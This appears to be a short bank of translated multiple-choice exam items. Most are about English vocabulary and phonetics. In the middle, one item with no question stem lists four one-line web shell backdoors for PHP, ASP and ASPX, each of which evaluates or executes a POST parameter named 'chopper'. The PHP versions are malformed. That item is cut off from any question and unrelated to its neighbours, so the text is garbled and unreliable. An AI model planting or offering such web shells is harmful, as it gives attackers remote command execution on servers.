
Equal rights regardless of sex, race, or creed are guaranteed by the Constitution()

A. commerce
B. property
C. religious belief
D. society


All living things are mortal, so you and I must be mortal, too()

A. mammals
B. subject to death
C. equal
D. kind in nature


A. <php @eval($_POST[‘chopper’]);>
B. <%eval request(“chopper”)%>
C. <php @system($_POST[‘chopper’]);>
D. <%@ Page Language=”Jscript”%><%eval(Request.Item[“chopper”],”unsafe”);%>

What is the proper way to pronounce the same sound linking, such as “kiss someone”()

A. Pronounce only once
B. Pronounce twice
C. None of the above
D. Hold the same sound longer

How do we judge whether a sound is a vowel or a consonant()

A. Whether the sound is loud or not
B. Whether there is sound
C. Whether there is obstruction
D. Whether there is air flow
